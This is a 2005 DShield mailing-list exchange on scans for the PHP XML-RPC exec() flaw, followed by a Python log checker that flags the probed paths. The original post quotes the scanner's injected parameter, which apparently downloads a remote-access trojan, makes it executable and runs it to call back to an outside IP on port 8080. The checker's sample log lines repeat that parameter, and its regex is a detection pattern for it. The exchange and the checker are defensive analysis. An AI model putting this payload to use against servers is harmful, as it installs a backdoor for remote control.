[Dshield] Someone is scanning for PHP XML RPC vulnerability

Tom dshield at oitc.com
Tue Oct 11 13:09:53 GMT 2005


At 9:31 AM +0200 10/11/05, Stephane Grobety wrote:
>Apparently, someone is actively scanning for the PHP XMLRPC flaw. All
>my web servers and three completely separate networks have been probed.
>
>All the probes came from the same source IP:  216.33.212.32.
>
>The following locations are probed:
>
>//xmlrpc.php
>/xmlrpc.php
>/xmlrpc/xmlrpc.php
>/xmlsrv/xmlrpc.php
>/services/xmlrpc.php
>/blog/xmlrpc.php
>/drupal/xmlrpc.php
>/community/xmlrpc.php
>/blogs/xmlrpc.php
>/blogs/xmlsrv/xmlrpc.php
>/blog/xmlsrv/xmlrpc.php
>/blogtest/xmlsrv/xmlrpc.php
>/b2/xmlsrv/xmlrpc.php
>/b2evo/xmlsrv/xmlrpc.php
>/wordpress/xmlrpc.php
>
>Unfortunately, I don't quite understand the command it gives to the
>script. I think it's trying to connect back to 216.55.159.52 on 8080,
>and the presence of chmod seems to indicate that it targets Unix
>systems.
>
>The relevant parameter is:
>
>php-script='.60.255.44/cback;chmod_+x_cback;./cback_216.55.159.52_8080`;echo_'_end_';exit;/*
>
>Does someone understand this script?

Exploit was documented back in the summer and if users patched they 
should be OK. As stated in 
http://forum.hardened-php.net/viewtopic.php?id=9 it's an exec() 
exploit. What the above looks like is a piece of broken? code. The 
".60.255.44/cback" would appear to be broken. It probably was a 
curl/get from some IP of the code/script called cback, which is made 
executable and executed with parameters of 216.55.159.52 8080. cback 
appears to be the remote access trojan, BackDoor-CTM 
(http://vil.nai.com/vil/content/v_134857.htm).

Tom
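A small log checker for the probing described in this thread, added here as an example and not part of either poster's message. It assumes Apache "combined" access-log lines and that the scanner's parameter appears in the logged request line (as a GET query string); the sample lines are constructed for the demonstration, using the source IP, target paths and parameter reported above. It flags requests for the listed xmlrpc.php paths and, separately, the shell-injection markers (chmod, backticks, "exit;/*", the dropped file name cback) in the decoded query, then counts hits per source IP so a list member can see which host is doing the probing.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Paths reported on the list as probed by the scanner (from the original post).
PROBED_PATHS = {
    "//xmlrpc.php", "/xmlrpc.php", "/xmlrpc/xmlrpc.php", "/xmlsrv/xmlrpc.php",
    "/services/xmlrpc.php", "/blog/xmlrpc.php", "/drupal/xmlrpc.php",
    "/community/xmlrpc.php", "/blogs/xmlrpc.php", "/blogs/xmlsrv/xmlrpc.php",
    "/blog/xmlsrv/xmlrpc.php", "/blogtest/xmlsrv/xmlrpc.php",
    "/b2/xmlsrv/xmlrpc.php", "/b2evo/xmlsrv/xmlrpc.php", "/wordpress/xmlrpc.php",
}

# Apache "combined" log format (assumed); the request line is method, target, protocol.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Tokens from the parameter quoted on the list that mark a shell-command
# injection attempt: chmod, a backtick, the closing "exit;/*", the file name cback.
INJECTION_RE = re.compile(r"chmod|`|exit;\s*/\*|\bcback\b", re.IGNORECASE)


def analyze_line(line):
    """Return a finding dict for a suspicious log line, or None if it is benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    decoded = unquote(query)  # the parameter is URL-encoded as the server logged it
    findings = []
    if path in PROBED_PATHS:
        findings.append("known-probe-path")
    elif path.endswith("xmlrpc.php"):
        findings.append("xmlrpc-path")
    if INJECTION_RE.search(decoded):
        findings.append("shell-injection-indicators")
    if not findings:
        return None
    return {
        "ip": m.group("ip"),
        "path": path,
        "status": int(m.group("status")),
        "findings": findings,
    }


def scan_log(lines):
    """Run analyze_line over every line and keep only the hits."""
    return [f for f in (analyze_line(line) for line in lines) if f]


def probe_sources(hits):
    """Count suspicious requests per source IP (dict ip -> count)."""
    return dict(Counter(h["ip"] for h in hits))


# Constructed sample log lines (not from the original post). The first two carry
# the parameter quoted on the list, URL-encoded; the IP and paths are the reported ones.
PAYLOAD = ("php-script=%27.60.255.44/cback;chmod_+x_cback;"
           "./cback_216.55.159.52_8080%60;echo_%27_end_%27;exit;/*")
SAMPLE_LOG = [
    f'216.33.212.32 - - [11/Oct/2005:09:31:02 +0200] "GET /xmlrpc.php?{PAYLOAD} HTTP/1.0" 404 291 "-" "-"',
    f'216.33.212.32 - - [11/Oct/2005:09:31:03 +0200] "GET /blog/xmlrpc.php?{PAYLOAD} HTTP/1.0" 404 291 "-" "-"',
    '216.33.212.32 - - [11/Oct/2005:09:31:04 +0200] "GET /wordpress/xmlrpc.php HTTP/1.0" 404 291 "-" "-"',
    '10.0.0.5 - - [11/Oct/2005:09:32:10 +0200] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(h)
    print(probe_sources(hits))
```

Note that a POST body is not written to the access log, so a scanner that sends the XML-RPC payload in the body would only show up here through the path match; the status column tells you whether any of the probed paths actually exist on the server, which is the case worth following up.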

